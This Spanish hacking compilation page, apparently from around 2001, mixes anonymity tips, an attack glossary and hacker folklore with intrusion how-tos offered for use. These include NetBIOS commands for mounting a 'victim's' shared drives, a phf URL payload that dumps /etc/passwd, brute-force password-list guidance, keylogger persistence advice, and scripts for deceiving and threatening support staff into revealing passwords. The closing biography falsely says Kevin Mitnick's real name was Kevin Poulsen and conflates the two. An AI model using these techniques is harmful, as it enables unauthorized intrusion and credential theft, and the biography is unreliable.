SeGuRiDaD InTeRnEt Y ExPlIcAcIoNeS HaCkInG
|
|
SeGuRiDaD InTeRnEt Y ExPlIcAcIoNeS HaCkInG |
|
SeGuRiDaD InFoRmÁtIcA
AnOnImIcIdAd
Nuestros hábitos de navegación suelen ser accesibles para cualquiera que decida conocerlos. Una buena alternativa a la navegación tradicional es el uso de servidores proxy, que actúan como intermediarios entre nuestro ordenador e internet.
Otra
opción es establecer como nuestra página de inicio, la de anonimizadores, que
nos ofrecen un servicio gratuito de anonimicidad, a cambio de tragarnos un poco
de publicidad, claro. En las versiones de pago, "incomprensiblemente",
la velocidad de navegación es muy superior, pudiendo acceder además a
servidores seguros tipo HTTPS, y a servidores de FTP.
Aunque, siendo paranoicos, lo ideal es utilizar el servicio de pago de algunos anonimizadores , que nos permiten la navegación anónima, a través de cuatro servidores proxy ubicados en distintos países, y viajando encriptada la información entre ellos. Ojo, esto en algunos países como Francia o China, es delito.
RECOMENDACIONES ADICIONALES:
La utilización de cuentas de correo web o POP anónimas, (mejor las web que no revelen la IP). El colmo del refinamiento llega de la mano de algunos servidores que nos permiten usar nuestra cuenta indistintamente como POP o como web.
REDIRECCIONADORES.
Servicio que consiste en recoger los mensajes destinados a una dirección de correo electrónico y enviarlos a otra, con lo que permite el cambio de dirección de correo electrónico cuantas veces deseemos, conservando siempre la dirección del servicio de redireccionamiento.
TiPoS De AtAqUe
Message-ID: <[email protected]>
From: "Pany" <[email protected]>
Date: Fri, 27 Apr 2001 19:10:06 -0300
El objetivo de esto es q:
1. Los q hayan utilizado estos metodos los corrijan en sus objetivos y funcionalidades ya q yo no he experimentado la mayoría.
2. Aprender, aprender, aprender... Como veran el doc. debe tener muchos errores y es mi interes tener un buen resumen de todos ellos. Así q espero criticas.
3. Enseñar (si me dejan aplicar este termino). Para aquellos q no los conocen puede serles util.
4. Si les interesa pueden agregar los q quieran al glosario o a algun apunte q deseen realizar
Scanning (Búsqueda)
El Scaneo, como método de descubrir canales de comunicación susceptibles de ser explotados, lleva en uso mucho tiempo. La idea es recorrer (scanear) tantos puertos de escucha como sea posible, y guardar información de aquellos que sean receptivos o de utilidad para cada necesidad en particular. Muchas utilidades de auditoría también se basan en este paradigma.
TCP Connect() Scanning
Esta es la forma básica del scaneo de puertos TCP. Si el puerto está escuchando, devolverá una respuesta de éxito; cualquier otro caso significará que el puerto no está abierto o que no se puede establecer conexión con a él.
Las ventajas que caracterizan esta técnica es que no necesita de privilegios especiales y su gran velocidad.
TCP SYN Scanning
Cuando dos procesos establecen una comunicación usan el modelo Cliente/Servidor para establecer la conexión. La aplicación del Servidor "escucha" todo lo que ingresa por los puertos. La identificación del Servidor se efectúa a través de la dirección IP del sistema en el que se ejecuta y del número de puerto del que depende para la conexión. El Cliente establece la conexión con el Servidor a través del puerto disponible para luego intercambiar datos.
La información de control llamada HandShake (saludo) se intercambia entre el Cliente y el Servidor para establecer un dialogo antes de transmitir datos.
Los "paquetes" o segmentos TCP tienen banderas que indican el estado del mismo.
TCP FIN Scanning- Stealth Port Scanning
Hay veces en que incluso el scaneo SYN no es lo suficientemente "clandestino" o limpio. Algunos sistemas (Firewalls y filtros de paquetes) monitorizan la red en busca de paquetes SYN a puertos restringidos.
Para subsanar este inconveniente los paquetes FIN, en cambio, podrían ser capaces de pasar sin ser advertidos. Este tipo de Scaneo está basado en la idea de que los puertos cerrados tienden a responder a los paquetes FIN con el RST correspondiente. Los puertos abiertos, en cambio, suelen ignorar el paquete en cuestión.
Este es un comportamiento correcto del protocolo TCP, aunque algunos sistemas (entre los que se hallan los de Microsoft(r)) no cumplen con este requerimiento, enviando paquetes RST siempre, independientemente de si el puerto está abierto o cerrado. Como resultado, no son vulnerables a este tipo de scaneo. Sin embargo, es posible realizarlo en otros sistemas Unix.
Fragmentation Scanning
Esta no es una nueva técnica de scaneo como tal, sino una modificación de las anteriores. En lugar de enviar paquetes completos de sondeo, los mismos se particionan en un par de pequeños fragmentos IP. Así, se logra partir una cabecera IP en distintos paquetes para hacerlo más difícil de monitorizar por los filtros que pudieran estar ejecutándose en la máquina objetivo.
Sin embargo, algunas implementaciones de estas técnicas tienen problemas con la gestión de este tipo de paquetes tan pequeños, causando una caída de rendimiento en el sistema del intruso o en el de la víctima. Problemas de esta índole convierte en detectables a este tipo de ataque.
Eavesdropping-Packet Sniffing
Muchas redes son vulnerables al Eavesdropping, o a la pasiva intercepción (sin modificación) del tráfico de red.
Snooping-Downloading
Los ataques de esta categoría tienen el mismo objetivo que el Sniffing: obtener la información sin modificarla.
Sin embargo los métodos son diferentes. Aquí, además de interceptar el tráfico de red, el atacante ingresa a los documentos, mensajes de correo electrónico y otra información guardada, realizando en la mayoría de los casos un downloading (copia de documentos) de esa información a su propia computadora, para luego hacer un análisis exhaustivo de la misma.
El Snooping puede ser realizado por simple curiosidad, pero también es realizado con fines de espionaje y robo de información o software. Los casos mas resonantes de este tipo de ataques fueron: el robo de un archivo con mas de 1700 números de tarjetas de crédito desde una compañía de música mundialmente famosa, y la difusión ilegal de reportes oficiales reservados de las Naciones Unidas, acerca de la violación de derechos humanos en algunos países europeos en estado de guerra.
Spoofing-Looping
Spoofing puede traducirse como "hacerse pasar por otro" y el objetivo de esta técnica, justamente, es actuar en nombre de otros usuarios, usualmente para realizar tareas de Snooping o Tampering (ver a continuación Ataques de Modificación y Daño).
Una forma común de Spoofing es conseguir el nombre y password de un usuario legítimo para, una vez ingresado al sistema, tomar acciones en nombre de él.
El intruso usualmente utiliza un sistema para obtener información e ingresar en otro, y luego utiliza este para entrar en otro, y así sucesivamente. Este proceso, llamado Looping, y tiene la finalidad de "evaporar" la identificación y la ubicación del atacante.
El camino tomado desde el origen hasta el destino puede tener muchas estaciones, que exceden obviamente los límites de un país. Otra consecuencia del Looping es que una compañía o gobierno pueden suponer que están siendo atacados por un competidor o una agencia de gobierno extranjera, cuando en realidad están seguramente siendo atacado por un Insider, o por un estudiante a miles de Km de distancia, pero que ha tomado la identidad de otros.
La investigación de procedencia de un Looping es casi imposible, ya que el investigador debe contar con la colaboración de cada Administrador de cada red utilizada en la ruta. El envío de falsos e-mails es otra forma de Spoofing que las redes permiten. Aquí el atacante envía E-Mails a nombre de otra persona con cualquier motivo y objetivo.
DNS Spoofing
Este ataque se consigue mediante la manipulación de paquetes UDP pudiéndose comprometer el servidor de nombres de dominios (Domain Name Server-DNS) de Windows NT(c). Si se permite el método de recursión en la resolución de "Nombre"Dirección IP" en el DNS, es posible controlar algunos aspectos del DNS remoto. La recursión consiste en la capacidad de un servidor de nombres para resolver una petición de dirección IP a partir de un nombre que no figura en su base de datos. Este es el método típico (y por defecto) de funcionamiento.
Web Spoofing
En el caso Web Spoofing el atacante crea un sitio web completo (falso) similar al que la víctima desea entrar. Los accesos a este sitio están dirigidos por el atacante, permitiéndole monitorizar todas las acciones de la víctima, desde sus datos hasta las passwords, números de tarjeta de créditos, etc. El atacante también es libre de modificar cualquier dato que se esté transmitiendo entre el servidor original y la víctima o viceversa.
IP Splicing-Hijacking
Se produce cuando un atacante consigue interceptar una sesión ya establecida. El atacante espera a que la victima se identifique ante el sistema y tras ello le suplanta como usuario autorizado.
Utilización de Exploits
Es muy frecuente ingresar a un sistema explotando agujeros en los algoritmos de encriptación utilizados, en la administración de las claves por parte la empresa, o simplemente encontrado un error en los programas utilizados.
Los programas para explotar estos "agujeros" reciben el nombre de Exploits y lo que realizan es aprovechar la debilidad, fallo o error hallado en el sistema (hardware o software) para ingresar al mismo. Nuevos Exploits (explotando nuevos errores en los sistemas) se publican cada día por lo que mantenerse informado de los mismos y de las herramientas para combatirlos es de vital importancia.
Uso de Diccionarios
Los Diccionarios son archivos con millones de palabras, las cuales pueden ser passwords utilizadas por los usuarios. Este archivo es utilizado para descubrir dicha password en pruebas de fuerza bruta. El programa encargado de probar cada una de las palabras encripta cada una de ellas (mediante el algoritmo utilizado por el sistema atacado) y compara la palabra encriptada contra el archivo de passwords del sistema atacado (previamente obtenido). Si coinciden se ha encontrado la clave de acceso al sistema mediante el usuario correspondiente a la clave hallada.
Actualmente es posible encontrar diccionarios de gran tamaño orientados, incluso, a un área específico de acuerdo al tipo de organización que se este atacando.
Un EtC.. MuY LaRgo
EsToS TeXtOs HaN SiDo PrOpOrCiOnAdOs PoR ( "HaY GeNtE Pa Tó... MALAGA(ESPAÑA)")
CoNcEpTo De LaMeRs
Quiero
dejar claro mi más absoluto desprecio a los lameculos ignorantes y estúpidos
que se dedican a entrar en ordenadores ajenos valiéndose de herramientas
creadas por terceros, para destrozar cuanto encuentran a su paso.
Estos desgraciados no se dan cuenta que pueden entrar inadvertidamente en los
ordenadores de un hospital extranjero (donde no conocen el idioma y no saben que
se trata de un hospital), y pueden con su actividad poner en peligro la vida de
pacientes del mismo, o incluso acabar con ella - pensemos en los ordenadores de
la UVI -
Para ellos: mal rayo os parta, que diría Lola Flores refiriéndose al Solchaga.
Estimado
futuro "jaker":
En primer lugar tú no puedes llamarte de cualquier manera si te vas a dedicar a esto: no vale Pepe, Ramirez, Lucas o cosas así. Debes elegir un "nick" apropiado como Kajjin, kOrLeOnE, BronKa, ViErNeS13, o similar.
Tu dirección de correos no puede ser tan vulgar como la mía. Debes buscarte algo acorde con el nick, y por supuesto más falsa que una moneda de 30 duros, por ejemplo: [email protected] (nada de jerarquía .es, la tuya debe ser .com, .org, u otra similar de tu invención (ejemplo de la vida real: "[email protected]"), aunque resulte que eres de Ceuta y uses el OUTLOOK EXPRESS.
Por supuesto tú no usas una computadora (¡joder!), ni un cerebro electrónico (¡esto ni de coña, por favor!), ni siquiera un ordenador. Lo tuyo es una "máquina" que corre bajo UNIX o LINUX. Como se te ocurra nombrar GÜINDOS la cagaste pa toa la vida.
Tus mensajes (desde ahora "posts") al grupo, una vez redactados "offline" los repasas, quitas las Q y las cambias por K, así como los sonidos CA (KA), CO (KO), CU (KU). ¡No sabes la impresión de duro, de "halternatibo", de algo así como a lo Santiago Segura, que da este toke!... Si además dejas caer que te encanta INTOZIKAZION EHTILIKA, JENOZIDAS HAGUERRIDOS... ¡jo! eso ya es la hostia...
Tu "news reader" (o sea el programejo para leer estas tonterías) es la última versión del "AGENT", debidamente crakeada, cuando tú no tienes ni pajolera idea de inglés y encima el coñazo de no saber como leches marcar, bajar, responder, eliminar... En fin, todo sea por el bien de la causa, con lo cómodo que es el Netscape o el Outlook Express (spanish version, claro).
Por supuesto no se te ocurra pedir nada. Tú lo sabes todo (de momento). Cuando te consideren "gurú" llega el momento de pedir el crack del WINZIP o cualquier otra "merde" por el estilo diciendo que es "pa un kolega jili ke usa er Güindoz"
7. En alguno de tus post debes contar que una vez te colaste en un sistema como "root", "deduciendo" login y pasword, y que les dejaste una hermosa "huella" de tu paso (no vayas a decir que te cagaste, que tampoco es eso)
8. Ni se te ocurra decir que bajas soft de Paniagua, Tucows, Ethek, Shareware, y mucho menos de Microsoft (dí siempre Mocosof, que mola un mazo). Tú esos sitios ni los visitas; te pasas horas en Islatortuga (aunque solo sea mirando extasiado la "home page"), Kanniball, o en el PGP (del que por supuesto tienes la última versión). Antes molaba el Private Idaho, pero desde que el Keanu Reeves hizo la película suena un poco amariconado, o sea por allí tampoco irás desde ahora.
9. Estás suscrito, por supuesto a todos los grupos 2600, warez, hacking, prehaking (esto no se como s'escribe) y fucking (esto sí), y por aquí solo vienes a dar algún consejillo que nunca es alabado ni valorado lo suficiente (snif...).
10.
Contesta (manda "replys") a todos los post off topic que pidan algo
como craks, drivers, serial numbers... en el que aparezca algo así como "¡Tú
eres un lamer de mierda!", o "ke t den". ¡Ah! olvídate de
horterolas y cutremóvil; tú no usas esas pijadas de "lamer", como
mucho un GSM con "tarjeta de recarga tomática, jejeje".
Al poco tiempo te habrás hecho un nombre y ya puedes empezar a pedir lo que
pide la mayoría. Verás que hay poco hacker a los que admirar, y que lo que
abunda es un puñado de "marianos" que van por la vida presumiendo de
no se qué...
Saludos, sus y a por ellos. O'F.
HaCkInG
...Dadme 10 Hackers y dominare el mundo en 24 horas...
Están en tu disco duro. Están en tu módem. Están en tu teclado. Están en todas partes y su
reino es la gran telaraña de Internet y los bits que viajan por la ReD
.Hackers, sinónimo de delincuentes informáticos para algunos, y genios de las nuevas tecnologías para
otros, lo cierto es que la palabra Hackers ha revestido diversos significados a través del tiempo y los medios de información. Si retrocedemos un poco en el pasado, daremos cuenta que así se les llamaban a los técnicos de telefonía por la forma en que solían reparar los teléfonos. Con un golpe seco como habitualmente ponían de nuevo en marcha el teléfono, pronto este modo de operar, ostento el titulo de " Hack" que traducido literalmente significaba Hachazo y que a su vez resumía, el arreglo del aparato tras un golpe certero. Así a los técnicos que empleaban esta técnica se les llamaban cariñosamente " Hackers ". Años mas tarde un grupo de estudiantes del MIT arrebataron el titulo de " Hackers " a estos técnicos, por las soluciones que adoptaron los mismos por hacerse un hueco delante de la única computadora de la universidad, sin necesidad de penetrar físicamente en la habitación, donde traqueteaba incesante la gran mole de cables y transistores ante las ordenes de unos dedos que no estaban allí.Un hombre obeso con bigote es entrevistado
...si, se lo que es un virus ! los virus te fastidian el ordenador y cuando lo hace te muestra un mensaje
absurdo, es obra de locos!...
Una mujer de poca edad es entrevistada
...Hackers ?...son esos tipos que se pasan el día y la noche delante del ordenador...y que...lo saben todo
a través de el...
Un niño entrevistado
...si, son personas muy inteligentes que lo saben todo acerca de los ordenadores y odian a Bill Gates.
Son genios...yo quiero ser uno de ellos cuando sea mayor !
Un anciano entrevistado
...Un jaaa...que ? que es eso ?
...Los Hackers son una parte fundamental de la ReD y de los ordenadores, quizás porque están siempre
ahí, detrás de todo cuanto sucede en la ReD. De hecho son los únicos que conocen perfectamente todos los entramados de la ReD. Y hoy por hoy el mito de la ReD no esta en la capacidad de información de esta, si no en la forma en como se mueven estos genios de la informática. Siempre ocultos, buscando nuevos bugs en los sistemas remotos con el fin de poner a prueba sus altos conocimientos. Solo de esta forma, pueden sentirse seguros en una ReD plagada de nuevos clanes aun mas terroríficos que los Hackers...El Hacking simplemente nació como un estado de
diversión y satisfacción personal y durante muchos años a revestido diversos significados. Obviamente todos los comentarios acerca del Hacking han resultado siempre acusadores y negativos. Pero la culpa no esta en el hecho de hacer Hacking, sino en el uso que se hace de el.Hacker es una palabra prácticamente intraducible que ha revestido, a lo largo de los años, diversos significados como ya se ha dicho. Pero parece ser que este acrónimo se vincula muy especialmente a los llamados Hacks o dicho de otra manera, así se llaman los golpes secos que efectuaban los técnicos de telefonía cuando intentaban reparar alguno de sus aparatos. Estos golpes secos recibían el nombre de « hachazos « o en el argot ingles Hacks y es mas que probable que quienes lo hacían se denominaban Hackers.
Carta de un Hacker a una editorial:
Hola, soy Cybor. Probablemente no me conozcan. Tampoco pretendo salir en la prensa. Eso no
me importa, sin embargo si hay otras cosas que me interesan mas que mi identidad. Por ejemplo,
me interesan las aperturas de sistemas cifrados. Pero eso es algo que nadie te enseña. Eso
tienes que aprenderlo por ti mismo. También me interesa que todos sepáis quienes somos y que
no estamos solos en este peculiar mundo. Me interesa que sepan que no todos los Hackers
somos iguales. También me interesa saber que la palabra Hacker tiene un significado muy curioso.
En un articulo reciente se publicó que se nos conocían como piratas informáticos. es probable,
pero creo que están tremendamente equivocados. Quiero reivindicar mi posición. Pero lo cierto
es que cada vez que hablan de nosotros es para decir que hemos reventado el ordenador de tal
multinacional con grandes perdidas o que hemos robado cierta información. estas cosas suceden,
y particularmente tengo que decir que estas cosas están al alcance de otros personajes mas
peligrosos que nosotros. En nuestro mundo habitan los crackers y los phreackers. También
están los snickers y cada uno de ellos tiene su cometido, pero para la mayoría todos somos
iguales y todos somos piratas informáticos.
Pero quiero ir por pasos. ¿ que te parece saber de donde procede la palabra Hacker ?. En el
origen de esta palabra esta el término Hack - algo así como golpear con un hacha en ingles-, que
se usaba como forma familiar para describir como los técnicos telefonicos arreglaban las cajas
defectuosas, asestándoles un golpe seco. También mucha gente arregla el televisor dándole una
palmada seca en el lateral. Quien hacia esto era un hacker. Otra historia relata como los primeros
ordenadores grandes y defectuosos, se bloqueaban continuamente y fallaban. Los que las
manejaban se devanaban los sesos creando rutas para aumentar la velocidad y cosas parecidas.
Estas cosas se denominaban Hacks y a los que lo hacían se les llamaban Hackers.
Otra denominación se le hacia a aquel experto en cualquier campo que disfrutaba modificando
el orden de funcionamiento del aparato. De esta forma siempre superaba las limitaciones y esto
le producía una alta satisfacción. A estas personas también se les llamaban Hackers. Pero pronto
surgieron otros acrónimos como Crackers. este acrónimo surgió allá por el año 1985, y fue
inventado por los propios Hackers para diferenciar a aquel que fisgaba en un ordenador con
aquel que creaba un virus dañino o copiaba un software. Así, frente a un ordenador ajeno un
Hacker y un Cracker no son la misma cosa.
Por otro lado en algunas ocasiones un Hacker es muy útil porque siempre detecta un agujero
en cualquier programa nuevo. Esto es bueno para ponerlo en conocimiento de la empresa que ha
creado el programa. El Cracker aprovecharía este error para entrar en el programa y copiarlo.
Aparte del Cracking existen otras formas de vandalismo tecnológico. Así, el Phreacking, por
ejemplo es la manipulación de las redes telefónicas para no pagar las llamadas. El Carding se
refiere al uso ilegal de las tarjetas de credito. Y el Trashing consiste en rastrear la basura o
residuos de los sistemas informáticos en busca de información como contraseñas.
Pero, volviendo a los Hackers. ¿ Como son ? ¿ Que aspecto tienen ?. Cuando alguien oye
mencionar la palabra Hacker rápidamente se le viene a la cabeza un adolescente ojeroso, con
los ojos inyectados en sangre que ha pasado las ultimas 24 horas delante del ordenador. esta
imagen esta estereotipada. No es así. Un Hacker puede ser cualquier estudiante de informática
o electrónica, que sale con los amigos y que tiene novia. Un Hacker es una persona normal como
tu.
Los Hackers son casi siempre gente joven. Quizas somos los que mas nos interesamos por la
tecnología. Un Hacker normalmente despierta el gusanillo a temprana edad. Y no se hace de la
noche a la mañana. Cuando logra serlo después de realizar un Hack, se busca un apodo y no da
la cara por cuestión de seguridad. La gente todavía no confía en nosotros y nos ven con ojos
malos.
Normalmente al final de todo somos contratados por empresas importantes para ayudarles en
su trabajo. y otra cosa que hacemos es contar como funciona la tecnología que se nos oculta.
Este método se llama enseñar y creo que no es nada malo.
De modo que si un Hacker escribe un libro es porque tiene algo que enseñar y nada mas.
Bueno, creo que ya he escrito bastante. son las doce y media de la noche y mis padres ya se han
acostado. Mañana tengo que madrugar. Y sobre todo quiero que quede buena constancia de lo
que somos.
Cybor, Bangor.
...No están solos. Detrás de ellos existe toda una legión de acrónimos que engordan cada vez mas la lista,
pero los mas inmediatos son los Crackers que curiosamente también se ven divididos según su propia
especialidad. Pero puedo adelantar que los Crackers en su puro estado, son aquellos que penetran en un
ordenador remoto y vulnera las defensas, para extraer del ordenador u ordenadores remotos, información
importante, cuando esto sucede el Cracker suele dejar su tarjeta de visita en forma de virus en el peor de
los casos o en forma de Troyano, si su intención es volver a entrar en el. Este es el primer grupo. El
segundo grupo, también denominado Warezman, esta especializado en Crackear Software, esto es, desproteger
un Software en versión Trial o de prueba y conseguir que este no presente caducidad. Esto lo
consiguen escribiendo un pequeño programa que parcheara el ejecutable del programa afectado y de ahí
surge el nombre de Crack. Un Warezman también puede definirse en dos grupos, los que ya he comentado
y los que ofrecen Software crackeado a través de Internet. Si esta ultima operación se realiza desde el
CD, esto es, que el Warezman duplica Software en CD, entonces se define como pirata informático...
NeT BiOs PaRa ToNtOs (incompleto)
nbtstat -A dirección_ip_de_la_pc
El resultado de este comando tendría que ser algo parecido a esto.
NetBIOS Remote Machine Name Table
Name Type Status
--------------------------------------------------------------------------------------------------------------------
VICTIMA <00> UNIQUE Registered
GRUPO <00> GROUP Registered
VICTIMA <03> UNIQUE Registered
VICTIMA <20> UNIQUE Registered
GRUPO <1E> GROUP Registered
USUARIO <03> UNIQUE Registered
MAC Address = 00-41-34-3D-15-1F
Los más importante en esto es que salga <20>, eso significa que hay recursos compartidos, o sea que tenemos posibilidades de entrar.
net view \\direccion_ip_de_la_pc
y la salida tendría que ser algo parecido a esto.
Recursos compartidos en dirección_ip_de_la_pc
Recurso Tipo Uso Compartido
C Disco Disco rigido 20Gb
CD Disco Lectora de cd
D Disco Disco rigido 15Gb SCSI
Se ha completado el comando con éxito
net use x: \\direccion_ip_de_la_pc\recurso_elejido
por ejemplo
net use x: \\255.255.255.255\c
Una vez que terminamos de usar el disco de la víctima lo podemos desconectar poniendo lo siguiente.
net use f: /delete
TECNICAS PARA HACKEAR
Estas son algunas tecnicas ke pueden ser utilizadas para el hacking. Si keres usarlas hacelobajo tu responsabilidad. Ni yo ni el grupo se van a hacer kargo de tus actos.
1. Ke son las tecnicas
2. Fuerza bruta
3. Phf
4. Ingenieria social (IS)
5. Ingenieria social inversa (ISI)
6. Trashing
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
1. Ke son las tecnicas
Para hackear hace falta poner en practica teknicas. Las teknicas de un hacker son:establecer el metodo de fijacion de un blanco, reunir informacion sobre el blanko, investigacionde los exploits del sistema operativo, seleccion de exploit a utilizar, informacion ke se va abuscar dentro del sistema, programas a utilizar.
Yo recomiendo ke unja vez dentro del sistema instalemos un keylogger en un directorio al ke podamosingresar en modo guest o a travez del ftp. Esto es por si el root kambia las kontraseñas no podriamosvolver a entrar al sistema y abria ke hacer todo el trabajo otra vez. Ademas podremos llevar unregistro de kuales son las actividad en el sistema y la regularidad de uso.
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
2. Fuerza Bruta
La fuerza bruta (a presar de su nombre) no rekiere ninguna fuerza corporal, rekiere una gran fuerzamental, paciencia y una pizca de suerte, inteligencia y zagasidad.Esta tecnica se basa en reunir informacion sobre el sistema, informacion personal del root y kuando tenemosmucha informacion hacer una lista de passwords. Una lista de password es una lista donde anotamostodas las posibles claves ke el sistema ke estamos tratando de hackear podria utilizar como password.
Tambien debemos combinar las claves kon numeros, mayusculas, minusculas, etc.
Una lista de passwords podria ser:si sabemos ke el root se llama juan:
juan
juan1
juan123
JuaN
JJUUAANN
nauj
j1u2a3n4
y kosas komo esa, klaro ke una lista kompleta deberia llegar hasta unos 2000 claves.
Una vez ke nuestra lista esta hecha debemos conectarnos via telnet (puerto 23) o ftp (puerto 21)al host de la komputadora.
Una vez ke nos pide por el login le damos el nombre de usuario del ke has reunido toda la informacion,y en password intentas kon kada una de las claves de tu lista de password.
Es por eso ke esta tecnika se vuelve tan dificil de hacer si tu paciencia no es excelente, y lopeor es ke a veces los root ingresan komo password kosas komo: fjkdfjsa542ld !!!pero si logramos entrar kon un usuario ya sera un progreso!
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
3. Phf
El phf es una tecnica de la mas simple, pero ya esta demasiado pasada de moda y funciona en muypokos sistemas, pero te rekomiendo ke antes de probrar kon nada pruebes kon esta ya ke no pierdesmas ke unos segundos en fijarte si es funciona o no.
Lo ke hay ke hacer es lo siguiente:a la URL de la victima le ponemos al lado la siguiente linea:
cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwdejemplo:
la url de nuestra victima es www.victima.com:
http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
si todo sale bien nos dara un listado de password (ver http://hg.hypermart.net/textos/contrasenas.txt).
Si eso no es lo ke aparece es por ke no podemos utilizar esta tecnica en ese server.
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
4. Ingenieria social
La ingenieria social es el intento de convencer hablando a un usuario legal del sistema para kerevele todo lo ke es necesario para superar las barreras de seguridad.
EL PEDIDO DIRECTO
La forma + directa ke puede ensayar un intruso para acceder a un sistema es justamente pediracceso a el en forma clara y directa, con la justificacion de ke (si se le otorga acceso)reportara cuales son las debilidades del sistema.
EL PROBLEMA DEL SERVICIO TECNICO
El servicio tecnico proveido por terceros es uno de los puntos debilis de la seguridad informatica+ aprovechables. En este caso el servicio tecnico puede hacerse nuestra fuente d informacion.
Lo ke podemos hacer es lo siguiente:
si logramos entrar en una empresa fisicamente, dejar, sin ke nadie se de cuenta, tarjetas impresasdiciendo algo como:
SOPORTE TECNICO GRATUITO
TEL: 123-4567 [<---DEBE SER UN TELEFONO KE ESTE CERCA NUESTRO TODO EL TIEMPO Y KE PODAMOS ATENDER
NOSOTROS]
Kuando alguien nos llame por algun problema le preguntamos cual es el problema, y kuando nos terminade decir lo ke pasa le decimos:
-"mmmmm, necesitaria un poco de informacion sobre el sistema para solucionar eso." O algo asi,y hay le pedimos la info y/o la password, tambien sirve dar una explicacion usando muchos terminosdificiles de comprender antes de pedir un password ya ke mostramos ke sabemos del tema y ke vamosa ayudarlos realmente :)
Tambien podemos conseguir el numero de telefono de una secretaria (persona ideal para la IS) ycuando las llamamos le decimos ke tenemos ke realizar una base de datos kon todos los usuarios ypassword de la empresa.
Esto tambien nos servira para llamar al dia siguiente a otra secretaria de la misma empresa ya queposiblemente laprimer secretaria a la ke llamamos comento lo ke paso a sus amigas secretarias y estas estuviesen esperando un llamado parecido al ke ella recibio. :)
Se te pueden ocurrir millones de tecnicas muy utiles!!! asi ke a ponerse a pensar y a trabajar!!!
Otro forma muy tipica es decirle a un usuario ke la empresa ke le brinda un servicio ha tenidoun problema kon sus makinas y ke necesitan las passwords. Aun ke no lo creas esto funciona muy bien!
Si no tienes tiempo ke perder puedes llamar a una secretaria y acerte pasar por un soporte tecnicopreguntandole si no tienen problemas con las makinas, sistemas, etc.komo siempre hay problemas kon las komputadoras ella le dira seguramente ke algo pasa, si nos dice ke todo esta bien es por le extraño la idea de ke un servicio tecnico llamara para asegurarse de ke todo funciona bien.
Esto es la razon por la ke no siempre funciona esta tecnica.
Dentro de un tiempo voy a ampliar este documento kon un ejemplo de lo ke se puede lograr.
Konseguilo en http://hg.hypermart.net/textos/tecnicas.txt
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
5. Ingeneria Social Inversa
Esta es una tecnica ke funciona en un porcentaje aproximado al 90% :)
Lo ke hacemos es lo mismo ke en la Ingenieria social pero en lugar de hacernos pasar por un soporte tecnico nos hacemos pasar por un usuario de alto cargo, ya ke generalmente son arrogantes y no konosen ni el procesador de su komputadora.
Podriamos llamar a un soporte tecniko de una empresa y parecer indignados y extremadamente enojados.
Kuando nos konstenten del otro lado del telefono kon la tipica presentacion "Soporte tecnico. Buenas
tardes" nos los dejes terminar, en kuanto eskuches "sopor..." GRITALES "ESTO ES INCREIBLE!!!" "ME TOMO
UN FRANKO DE DOS DIAS Y KUANDO VUELVO NO TENGO MAS ACCESO A MI KUENTA!!! (tenes ke parecer muy enojado pero seguro de lo ke decis, para esto tenes ke tener muchos datos de la empresa, como el nombre del gerente o presidente por el ke te estas haciendo pasar) EN ELLA TENIA MUCHOS DATOS IMPORTANTICIMOS!
LOS VOY A DESPEDIR A TODOS (hacelos preocupar, ke tengan miedo de ke los echen, es muy efectivo) KIERO
KE ME LA DEVUELVAN DE INMEDIATO!". La persona del soporte tekniko seguramente se asustara y te preguntara
ke fue lo ke paso. Kon voz de indignado y algo enojado (pero sin gritar demasiado) les decis "NO SE (importante ke parezcas un estupido en la rama de la tecnologia), KUANDO PRENDI LA MAKINA ME PIDE UNA
KONTRASEÑA KE JAMAS ME HABIA PEDIDO! NO SE KE PONERLE!" (es un poco directo) seguramente del otro lado te diran "probo ya kon XXXX"!
BINGO!, CONSEGUIMOS LA CONTRASEÑA!
ahora, sin kortarle, tenes ke tipear la kontraseña (ke se escuche un teclado), pero tenes ke tiperla muy lentamente, ke no se escuche ke tu velocidad de tipeo no es la de un novato. Si podes fijarte si la kontraseña es valida sin tener ke kortar la linea pruebala, hay tienes dos kaminos: si funciona, agredece kon voz de enojo y rapidamente, algo komo =ok, gracias, chau.
Pero si no funciona enojate mas, grita mas y sobre todo amenazalos mas.
Si no te podes fijar si funciona deciles: ok, me fijo y los vuelvo a llamar (y kortas rapidamente sin chau, hasta luego o lugar para ke el otro diga algo). Si funciona la kontraseña nos los llames, pero si no funciona llamalos de nuevo y mucho mas enojado (+ enojado ke si hubieses probado sin kortar a komunikacion).
En este kaso tambien tenes ke gritar y amenazarlos mucho.
~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°~°
6. Trashing
El trashing es una actividad ke algunos (la mayoria) puede llegar a darle asco. Lo ke esta actividad se refiere es a la revizacion de las bolsas de basura de la empresa ke deseamos hackear.
Esta actividad tiene como fin encontrar papeles con anotaciones, memos, passwords y komo siempre,
ViDa De KeViNd D. MiTnIcK
Kevin Mitnick cuyo verdadero nombre era Kevin Poulsen es quizás el más famoso hacker de los últimos tiempos. Nacido el 6 de Agosto de 1963 en Van Nuts, California, desde muy niño sintió curiosidad por los sistemas de comunicación electrónica y fue auto cultivando una obsesiva curiosidad por investigar cosas y lograr objetivos aparentemente imposibles, hasta llegar a poseer una genial habilidad para ingresar a servidores sin autorización, robar información, interceptar teléfonos, crear virus, etc.
Cuando el gobierno acusó a Kevin de haber substraído información del FBI, relacionada a la investigación de Ferdinand Marcos y de haber penetrado en computadoras militares, Poulsen decidió defenderse en la clandestinidad, convirtiéndose en un fugitivo de la justicia.
